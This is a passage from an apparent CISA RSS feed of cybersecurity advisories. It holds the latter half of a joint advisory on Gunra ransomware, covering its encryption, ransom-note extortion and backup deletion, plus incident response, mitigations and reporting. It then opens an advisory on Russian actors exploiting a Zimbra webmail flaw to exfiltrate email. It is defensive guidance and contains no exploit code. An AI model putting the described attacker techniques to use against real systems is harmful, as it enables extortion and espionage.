&lt;td&gt;Data Encrypted for Impact&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1486&quot; target=&quot;_blank&quot; title=&quot;T1486&quot;&gt;T1486&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;Gunra actors encrypt victim data using combined ChaCha20 + RSA-4096 algorithms to prevent victim access to critical business files. Gunra encryptors are available for Windows and Linux, increasing the potential attack surface within a victim network.&lt;/p&gt;
&lt;p&gt;In one instance, Gunra actors encrypted key assets that included database servers and NAS systems.&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Financial Theft&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1657&quot; target=&quot;_blank&quot; title=&quot;T1657&quot;&gt;T1657&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Under the double-extortion model, Gunra actors demand ransom payment through a ransom note (&lt;code&gt;R34DM3.txt&lt;/code&gt;) in cryptocurrency. The note instructs victims to make the payment to prevent public leaks of their sensitive business data and acquire decryption keys to unlock encrypted files on compromised systems.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Inhibit System Recovery&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1490&quot; target=&quot;_blank&quot; title=&quot;T1490&quot;&gt;T1490&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;To augment encryption of critical data on victim networks and prevent system recovery, Gunra actors disable backup features, such as volume shadow copies.&lt;/p&gt;
&lt;p&gt;In one instance, Gunra actors prevented restoration from backups by deleting backup and archived data stored at the primary data center and disaster recovery center.&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;&lt;strong&gt;Incident Response&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;If a potential compromise is detected, but ransomware actors have not (yet) encrypted items, organizations should take the following actions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Determine which hosts were compromised and isolate them&lt;/strong&gt; by quarantining or taking them offline.&lt;br&gt;
&lt;ol type=&quot;a&quot;&gt;
&lt;li&gt;&lt;strong&gt;If the incident involves a Gunra Linux variant,&lt;/strong&gt; &lt;strong&gt;preserve encrypted files, file timestamps, ransom notes, and relevant system logs&lt;/strong&gt;.&lt;br&gt;
&lt;ol type=&quot;i&quot;&gt;
&lt;li&gt;As of March 2026, researchers identified a weakness in the Gunra ransomware’s Linux Executable and Linkable Format (ELF) variants (appended with &lt;code&gt;.GNRA&lt;/code&gt;); the encryption keys use a weak pseudorandom number generator (PRNG) seeded with the predictable system&amp;nbsp;&lt;code&gt;srand(time(NULL)&lt;/code&gt;).&lt;a href=&quot;#Note14&quot;&gt;&lt;sup&gt;14&lt;/sup&gt;&lt;/a&gt; Defenders may leverage this to mathematically reconstruct the keys using file timestamps and recover files without paying the ransom.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Initiate threat hunting activities to scope the intrusion&lt;/strong&gt;. Collect and review relevant artifacts, logs, and other data to identify threat actor TTPs, compromised devices and accounts, a timeline of activity, etc. Responders should consider:&lt;br&gt;
&lt;ol type=&quot;a&quot;&gt;
&lt;li&gt;Reviewing logs of network appliances (e.g., edge devices) to audit actions associated with privileged users to identify anomalous activity.&lt;/li&gt;
&lt;li&gt;Collecting copies of ransom notes to identify current threat actor communication platforms.&lt;/li&gt;
&lt;li&gt;Auditing the creation of new files (particularly archives) to determine possible pre- or post-exfiltration activity.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Report the compromise&lt;/strong&gt; to the FBI and other agencies as appropriate (see &lt;a href=&quot;#Reporting&quot;&gt;&lt;strong&gt;Reporting&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; &lt;/strong&gt;for contact information).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Apply eviction countermeasures&lt;/strong&gt;, including those listed below, to contain the incident and eradicate the threat actor from the network (&lt;strong&gt;Note:&lt;/strong&gt; Start applying countermeasures after collecting enough threat hunting data to inform effective countermeasure selection; this will likely overlap with threat hunting activities).&lt;br&gt;
&lt;ol type=&quot;a&quot;&gt;
&lt;li&gt;Identify and disable malicious, actor-controlled accounts.&lt;/li&gt;
&lt;li&gt;Identify and secure legitimate, privileged accounts.&lt;/li&gt;
&lt;li&gt;Use CISA’s &lt;a href=&quot;https://cisa.gov/eviction-strategies-tool?utm_source=&amp;amp;utm_medium=CSAEviction&quot; title=&quot;Eviction Strategies Tool&quot;&gt;Eviction Strategies Tool&lt;/a&gt; to assemble countermeasures for a systematic eviction plan—the tool comprises &lt;strong&gt;Playbook-NG&lt;/strong&gt; (a web application) and &lt;strong&gt;COUN7ER&lt;/strong&gt; (a database of post-compromise countermeasures mapped to adversary TTPs).&lt;br&gt;
&lt;ol type=&quot;i&quot;&gt;
&lt;li&gt;Use Playbook-NG and COUN7ER together to assemble a systematic eviction plan, or playbook, that leverages distinct countermeasures to contain and evict cyber threat actors. The playbook features a list of recommended response actions based on threat actor TTPs and includes each action’s intended outcome, preparatory steps, and associated risks. For more information, see CISA’s &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/eviction-strategies-tool&quot; title=&quot;Eviction Strategies Tool Fact Sheet&quot;&gt;Eviction Strategies Tool Fact Sheet&lt;/a&gt;.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Harden the network to prevent additional malicious activity&lt;/strong&gt; (see &lt;a href=&quot;#Mitigations&quot;&gt;&lt;strong&gt;Mitigations&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; &lt;/strong&gt;for guidance).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If compromise is detected and items have been encrypted, see the “Ransomware and Data Extortion Response Checklist” in CISA’s joint &lt;a href=&quot;https://www.cisa.gov/sites/default/files/2025-03/StopRansomware-Guide%20508.pdf&quot; title=&quot;#StopRansomware Guide&quot;&gt;#StopRansomware Guide&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Mitigations&quot;&gt;&lt;strong&gt;Mitigations&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The authoring agencies recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of Gunra actor activity. These mitigations align with the &lt;a href=&quot;https://www.cisa.gov/cpg&quot; title=&quot;Cross-Sector Cybersecurity Performance Goals (CPGs)&quot;&gt;Cross-Sector Cybersecurity Performance Goals (CPGs)&lt;/a&gt; developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s &lt;a href=&quot;https://www.cisa.gov/cpg&quot; title=&quot;CPGs webpage&quot;&gt;CPGs webpage&lt;/a&gt; for more information on the CPGs, including additional recommended baseline protections.&lt;/p&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;&lt;strong&gt;Prioritize patching known exploited vulnerabilities&amp;nbsp;&lt;/strong&gt;[&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#MitigateKnownVulnerabilities2B&quot; title=&quot;CPG 2.B&quot;&gt;CPG 2.B&lt;/a&gt;] &lt;strong&gt;and the CVEs in this advisory&lt;/strong&gt; in internet-facing systems—including VPN gateways and RDP-exposed infrastructure—and keep all OSs, software, and firmware up to date to support this.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Implement a recovery plan&lt;/strong&gt; to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ImplementLogicalPhysicalNetworkSegmentation3I&quot; title=&quot;CPG 3.I&quot;&gt;CPG 3.I&lt;/a&gt;, &lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#MaintainSystemBackupsRestorationAbility3O&quot; title=&quot;3.O&quot;&gt;3.O&lt;/a&gt;, &lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ManageIncidentResponsePlans1C&quot; title=&quot;1.C&quot;&gt;1.C&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Review domain controllers, servers, workstations, and active directories&lt;/strong&gt; for new and/or unrecognized accounts [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ManageOrganizationalAssets2A&quot; title=&quot;CPG 2.A&quot;&gt;CPG 2.A&lt;/a&gt;, &lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#DocumentNetworkTopology2E&quot; title=&quot;2.E&quot;&gt;2.E&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Audit user accounts with administrative privileges and configure access controls&lt;/strong&gt; according to the principle of least privilege [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#AdministratorsMaintainSeparateUserandPrivilegedAccounts3G&quot; title=&quot;CPG 3.G&quot;&gt;CPG 3.G&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Segment networks&lt;/strong&gt; [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ImplementLogicalPhysicalNetworkSegmentation3I&quot; title=&quot;CPG 3.I&quot;&gt;CPG 3.I&lt;/a&gt;] to prevent the spread of ransomware.&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Require MFA&lt;/strong&gt; for all services to the extent possible, particularly for webmail, VPNs, and accounts that access critical systems [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ImplementMultifactorAuthentication3F&quot; target=&quot;_blank&quot; title=&quot;CPG 3.F&quot;&gt;CPG 3.F&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Disable command-line and scripting activities and permissions.&lt;/strong&gt; Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#AdministratorsMaintainSeparateUserandPrivilegedAccounts3G&quot; title=&quot;CPG 3.G&quot;&gt;CPG 3.G&lt;/a&gt;, &lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#DisableAutorunMacrosByDefault3M&quot; title=&quot;3.M&quot;&gt;3.M&lt;/a&gt;].&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Validate Security Controls&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization&#039;s security program against the threat behaviors mapped to the MITRE ATT&amp;amp;CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;amp;CK techniques described in this advisory.&lt;/p&gt;
&lt;p&gt;To get started:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Select an ATT&amp;amp;CK technique described in this advisory (see &lt;a href=&quot;#Table6&quot;&gt;&lt;strong&gt;Table 6&lt;/strong&gt;&lt;/a&gt; to &lt;a href=&quot;#Table18&quot;&gt;&lt;strong&gt;Table 18&lt;/strong&gt;&lt;/a&gt;).&lt;/li&gt;
&lt;li&gt;Align your security technologies against the technique.&lt;/li&gt;
&lt;li&gt;Test your technologies against the technique.&lt;/li&gt;
&lt;li&gt;Analyze your detection and prevention technologies’ performance.&lt;/li&gt;
&lt;li&gt;Repeat the process for all security technologies to obtain a set of comprehensive performance data.&lt;/li&gt;
&lt;li&gt;Tune your security program, including people, processes, and technologies, based on the data generated by this process.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;amp;CK techniques identified in this advisory.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Resources&lt;/strong&gt;&lt;/h2&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://www.stopransomware.gov/&quot; target=&quot;_blank&quot; title=&quot;StopRansomware.gov&quot;&gt;StopRansomware.gov&lt;/a&gt;: Whole-of-government, central location for ransomware resources and alerts.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/stopransomware-guide&quot; title=&quot;#StopRansomware Guide&quot;&gt;#StopRansomware Guide&lt;/a&gt;: Resource to mitigate a ransomware attack.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/cyber-hygiene-services&quot; title=&quot;Cyber Hygiene Services&quot;&gt;Cyber Hygiene Services&lt;/a&gt;, &lt;a href=&quot;https://github.com/cisagov/cset/releases/tag/v10.3.0.0&quot; target=&quot;_blank&quot; title=&quot;Ransomware Readiness Assessment&quot;&gt;Ransomware Readiness Assessment&lt;/a&gt;: CISA’s no-cost cyber hygiene services.&lt;/li&gt;
&lt;li&gt;USSS’s &lt;a href=&quot;https://www.secretservice.gov/investigations/cyberincident&quot; target=&quot;_blank&quot; title=&quot;Preparing for a Cyber Incident&quot;&gt;Preparing for a Cyber Incident&lt;/a&gt;: Outlines basic steps an organization can take before, during, and after a cyber incident.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Reporting&quot;&gt;&lt;strong&gt;Reporting&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Your organization has no obligation to respond or provide information back to the FBI and other authoring agencies in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI and other authoring agencies, reporting must be consistent with applicable state and federal laws.&lt;/p&gt;
&lt;p&gt;The FBI and other authoring agencies are interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, cryptocurrency wallet information, decryptor files, and/or a benign sample of an encrypted file.&lt;/p&gt;
&lt;p&gt;Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.&lt;/p&gt;
&lt;p&gt;The authoring agencies do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI’s &lt;a href=&quot;https://www.ic3.gov/Home/ComplaintChoice&quot; target=&quot;_blank&quot; title=&quot;Internet Crime Complaint Center (IC3)&quot;&gt;Internet Crime Complaint Center (IC3)&lt;/a&gt; or a &lt;a href=&quot;https://www.fbi.gov/contact-us/field-offices&quot; target=&quot;_blank&quot; title=&quot;local FBI field office&quot;&gt;local FBI field office&lt;/a&gt;, to USSS via a &lt;a href=&quot;https://www.secretservice.gov/contact/field-offices&quot; target=&quot;_blank&quot; title=&quot;local USSS Field Office&quot;&gt;local USSS Field Office&lt;/a&gt;, or CISA via the agency’s &lt;a href=&quot;https://www.cisa.gov/report&quot; title=&quot;Incident Reporting System&quot;&gt;Incident Reporting System&lt;/a&gt; or its 24/7 Operations Center (&lt;a href=&quot;mailto:contact@cisa.dhs.gov&quot; title=&quot;contact@cisa.dhs.gov&quot;&gt;contact@cisa.dhs.gov&lt;/a&gt;), or by calling 1-844-Say-CISA (1-844-729-2472).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;South Korean organizations:&lt;/strong&gt; Report cybersecurity incidents to KNPA via the &lt;a href=&quot;https://www.ecrm.police.go.kr/&quot; target=&quot;_blank&quot; title=&quot;online cybercrime reporting system&quot;&gt;online cybercrime reporting system&lt;/a&gt; or by calling 112.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Disclaimer&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;The information in this report is being provided “as is” for informational purposes only. CISA and co-sealers do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and co-sealers.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Version History&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;August 10, 2026: &lt;/strong&gt;Initial version.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Notes&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note1&quot;&gt;&lt;sup&gt;1&lt;/sup&gt;&lt;/a&gt; For information on historical Conti ransomware activity, see CISA and FBI’s &lt;a href=&quot;https://www.cisa.gov/news-events/alerts/2021/09/22/conti-ransomware&quot;&gt;Conti Ransomware&lt;/a&gt; advisory.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note2&quot;&gt;&lt;sup&gt;2&lt;/sup&gt;&lt;/a&gt; Breakglass Intelligence, “Gunra Ransomware’s Linux Variant Has a Fatal Flaw: time()-Seeded rand() Makes Encrypted Files Recoverable Without Paying,” Breakglass Intelligence, March 12, 2026, &lt;a href=&quot;https://intel.breakglass.tech/post/gunra-ransomware-s-linux-variant-has-a-fatal-flaw-time-seeded-rand-makes-encrypted-files-recoverable-without-paying&quot; target=&quot;_blank&quot;&gt;https://intel.breakglass.tech/post/gunra-ransomware-s-linux-variant-has-a-fatal-flaw-time-seeded-rand-makes-encrypted-files-recoverable-without-paying&lt;/a&gt;; Jeffrey Francis Bonaobra, Melvin Singwa, Emmanuel Panopio “Gunra Ransomware Group Unveils Efficient Linux Variant,” Trend Micro, July 29, 2025, &lt;a href=&quot;https://www.trendmicro.com/en_us/research/25/g/gunra-ransomware-linux-variant.html&quot; target=&quot;_blank&quot;&gt;https://www.trendmicro.com/en_us/research/25/g/gunra-ransomware-linux-variant.html&lt;/a&gt;; and CYFIRMA, “Gunra Ransomware – A Brief Analysis,” CYFIRMA, May 3, 2025, &lt;a href=&quot;https://www.cyfirma.com/research/gunra-ransomware-a-brief-analysis/&quot; target=&quot;_blank&quot;&gt;https://www.cyfirma.com/research/gunra-ransomware-a-brief-analysis/&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note3&quot;&gt;&lt;sup&gt;3&lt;/sup&gt;&lt;/a&gt; CloudSEK, “Inside Gunra RaaS: From Affiliate Recruitment on the Dark Web to Full Technical Dissection of their Locker,” CloudSEK, February 11, 2026, &lt;a href=&quot;https://www.cloudsek.com/blog/inside-gunra-raas-from-affiliate-recruitment-on-the-dark-web-to-full-technical-dissection-of-their-locker&quot; target=&quot;_blank&quot;&gt;https://www.cloudsek.com/blog/inside-gunra-raas-from-affiliate-recruitment-on-the-dark-web-to-full-technical-dissection-of-their-locker&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note4&quot;&gt;&lt;sup&gt;4&lt;/sup&gt;&lt;/a&gt; CYFIRMA, “&lt;a href=&quot;https://www.cyfirma.com/research/gunra-ransomware-a-brief-analysis/&quot; target=&quot;_blank&quot;&gt;Gunra Ransomware – A Brief Analysis&lt;/a&gt;”; and Breakglass Intelligence, “&lt;a href=&quot;https://intel.breakglass.tech/post/gunra-ransomware-s-linux-variant-has-a-fatal-flaw-time-seeded-rand-makes-encrypted-files-recoverable-without-paying&quot; target=&quot;_blank&quot;&gt;Gunra Ransomware’s Linux Variant Has a Fatal Flaw&lt;/a&gt;.”&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note5&quot;&gt;&lt;sup&gt;5&lt;/sup&gt;&lt;/a&gt; Bonaobra, “&lt;a href=&quot;https://www.trendmicro.com/en_us/research/25/g/gunra-ransomware-linux-variant.html&quot; target=&quot;_blank&quot;&gt;Gunra Ransomware Group Unveils Efficient Linux Variant&lt;/a&gt;”; and CloudSEK, “&lt;a href=&quot;https://www.cloudsek.com/blog/inside-gunra-raas-from-affiliate-recruitment-on-the-dark-web-to-full-technical-dissection-of-their-locker&quot; target=&quot;_blank&quot;&gt;Inside Gunra RaaS&lt;/a&gt;.”&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note6&quot;&gt;&lt;sup&gt;6&lt;/sup&gt;&lt;/a&gt; CloudSEK, “&lt;a href=&quot;https://www.cloudsek.com/blog/inside-gunra-raas-from-affiliate-recruitment-on-the-dark-web-to-full-technical-dissection-of-their-locker&quot; target=&quot;_blank&quot;&gt;Inside Gunra RaaS&lt;/a&gt;.”&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note7&quot;&gt;&lt;sup&gt;7&lt;/sup&gt;&lt;/a&gt; CYFIRMA, “&lt;a href=&quot;https://www.cyfirma.com/research/gunra-ransomware-a-brief-analysis/&quot; target=&quot;_blank&quot;&gt;Gunra Ransomware – A Brief Analysis&lt;/a&gt;.”&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note8&quot;&gt;&lt;sup&gt;8&lt;/sup&gt;&lt;/a&gt; CloudSEK, “&lt;a href=&quot;https://www.cloudsek.com/blog/inside-gunra-raas-from-affiliate-recruitment-on-the-dark-web-to-full-technical-dissection-of-their-locker&quot; target=&quot;_blank&quot;&gt;Inside Gunra RaaS&lt;/a&gt;.”&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note9&quot;&gt;&lt;sup&gt;9&lt;/sup&gt;&lt;/a&gt; CloudSEK, “&lt;a href=&quot;https://www.cloudsek.com/blog/inside-gunra-raas-from-affiliate-recruitment-on-the-dark-web-to-full-technical-dissection-of-their-locker&quot; target=&quot;_blank&quot;&gt;Inside Gunra RaaS&lt;/a&gt;.”&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note10&quot;&gt;&lt;sup&gt;10&lt;/sup&gt;&lt;/a&gt; Bonaobra, “&lt;a href=&quot;https://www.trendmicro.com/en_us/research/25/g/gunra-ransomware-linux-variant.html&quot; target=&quot;_blank&quot;&gt;Gunra Ransomware Group Unveils Efficient Linux Variant&lt;/a&gt;.”&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note11&quot;&gt;&lt;sup&gt;11&lt;/sup&gt;&lt;/a&gt; VirusTotal, “VirusTotal - File - 91f8fc7a3290611e28a35a403fd815554d9d856006cc2ee91ccdb64057ae53b0,” &lt;em&gt;VirusTotal&lt;/em&gt;, &lt;a href=&quot;https://www.virustotal.com/gui/file/91f8fc7a3290611e28a35a403fd815554d9d856006cc2ee91ccdb64057ae53b0/details&quot; target=&quot;_blank&quot;&gt;https://www.virustotal.com/gui/file/91f8fc7a3290611e28a35a403fd815554d9d856006cc2ee91ccdb64057ae53b0/details&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note12&quot;&gt;&lt;sup&gt;12&lt;/sup&gt;&lt;/a&gt; CloudSEK, “&lt;a href=&quot;https://www.cloudsek.com/blog/inside-gunra-raas-from-affiliate-recruitment-on-the-dark-web-to-full-technical-dissection-of-their-locker&quot; target=&quot;_blank&quot;&gt;Inside Gunra RaaS&lt;/a&gt;.”&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note13&quot;&gt;&lt;sup&gt;13&lt;/sup&gt;&lt;/a&gt; CYFIRMA, “&lt;a href=&quot;https://www.cyfirma.com/research/gunra-ransomware-a-brief-analysis/&quot; target=&quot;_blank&quot;&gt;Gunra Ransomware – A Brief Analysis&lt;/a&gt;.”&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note14&quot;&gt;&lt;sup&gt;14&lt;/sup&gt;&lt;/a&gt; Breakglass Intelligence, “&lt;a href=&quot;https://intel.breakglass.tech/post/gunra-ransomware-s-linux-variant-has-a-fatal-flaw-time-seeded-rand-makes-encrypted-files-recoverable-without-paying&quot; target=&quot;_blank&quot;&gt;Gunra Ransomware’s Linux Variant Has a Fatal Flaw&lt;/a&gt;.”&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
</description>
  <pubDate>Wed, 05 Aug 2026 08:27:56 EDT</pubDate>
    <dc:creator>CISA</dc:creator>
    <guid isPermaLink="false">/node/25261</guid>
    </item>
<item>
  <title>Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite</title>
  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-204a</link>
  <description>&lt;div class=&quot;c-page-title__buttons&quot;&gt;&lt;a class=&quot;c-button&quot; href=&quot;https://media.defense.gov/2026/Jul/22/2003965244/-1/-1/1/CSA_RUSSIA_PHISHING_TARGET_ZIMBRA.PDF&quot;&gt;Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite&lt;/a&gt;&lt;/div&gt;
&lt;h2&gt;&lt;strong&gt;Executive summary&lt;/strong&gt;&amp;nbsp;&lt;/h2&gt;
&lt;p&gt;A group of Russian state-supported cyber actors has been targeting and compromising various Western government and commercial organizations using the Zimbra Collaboration Suite (ZCS) software since at least July 2025. The Russian state-supported advanced persistent threat (APT) group’s activity is tracked in the cybersecurity community under several names (see &lt;a href=&quot;#cyber1&quot;&gt;Cybersecurity industry tracking&lt;/a&gt;), primarily as “LAUNDRY BEAR,” a name initially coined by the Netherlands General Intelligence and Security Service (AIVD) and Defence Intelligence and Security Service (MIVD) [&lt;a href=&quot;#wc1&quot;&gt;1&lt;/a&gt;].&lt;/p&gt;
&lt;p&gt;LAUNDRY BEAR’s targeting is almost certainly to gather sensitive information for the Russian Federation, with these actors primarily focusing on the covert acquisition of email data. Previous campaigns indicated LAUNDRY BEAR relied on unsophisticated initial access techniques—including password spraying, phishing, and pass-the-cookie—allowing the group to successfully run high-volume operations. The latest campaign targeting ZCS uses a novel exploit that was a zero-day vulnerability when first exploited and continues to be successfully exploited. The vulnerability, Common Vulnerabilities and Exposures (CVE) &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2025-66376&quot; target=&quot;_blank&quot;&gt;CVE-2025-66376&lt;/a&gt;, was patched in November 2025. This demonstrates LAUNDRY BEAR’s intent and ability to deploy increasingly sophisticated technical capabilities.&lt;/p&gt;
&lt;p&gt;Unlike traditional phishing campaigns that persuade a user into taking an action, such as clicking a link or opening a file, LAUNDRY BEAR’s latest campaign leverages a view-based exploit that only requires a user to view a malicious email within a vulnerable version of the webmail service. Once viewed, the exploit attempts to exfiltrate the victim’s last 90 days of email communications, the organization email directory (i.e., Global Address List [GAL]), and other sensitive information to servers controlled by LAUNDRY BEAR. The exploit also attempts to establish persistent access to victim accounts through a variety of means as detailed in the &lt;a href=&quot;#persistence1&quot;&gt;Persistence and credential access&lt;/a&gt; section.&lt;/p&gt;
&lt;p&gt;This Cybersecurity Advisory (CSA) warns of this ongoing malicious threat activity and urges organizations to update their vulnerable software and implement additional mitigations to thwart these Russian state-supported actors’ continued success. The CSA is being released by the following authoring and co-sealing agencies:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;United States National Security Agency (NSA)&lt;/li&gt;
&lt;li&gt;United States Federal Bureau of Investigation (FBI)&lt;/li&gt;
&lt;li&gt;Netherlands Defence Intelligence and Security Service (MIVD)&lt;/li&gt;
&lt;li&gt;Netherlands General Intelligence and Security Service (AIVD)&lt;/li&gt;
&lt;li&gt;United States Cybersecurity and Infrastructure Security Agency (CISA)&lt;/li&gt;
&lt;li&gt;United States Defense Counterintelligence and Security Agency (DCSA)&lt;/li&gt;
&lt;li&gt;United States Department of Defense Cyber Crime Center (DC3)&lt;/li&gt;
&lt;li&gt;United States Department of the Treasury&lt;/li&gt;
&lt;li&gt;United States Naval Criminal Investigative Service (NCIS)&lt;/li&gt;
&lt;li&gt;Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)&lt;/li&gt;
&lt;li&gt;Communications Security Establishment Canada’s (CSE’s) Canadian Centre for Cyber Security (Cyber Centre)&lt;/li&gt;
&lt;li&gt;New Zealand National Cyber Security Centre (NCSC-NZ)&lt;/li&gt;
&lt;li&gt;United Kingdom National Cyber Security Centre (NCSC-UK)&lt;/li&gt;
&lt;li&gt;Czech Republic National Cyber and Information Security Agency (NÚKIB)&lt;a href=&quot;#f1&quot;&gt;&lt;sup&gt;1&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Danish Defence Intelligence Service (DDIS)&lt;a href=&quot;#f2&quot;&gt;&lt;sup&gt;2&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
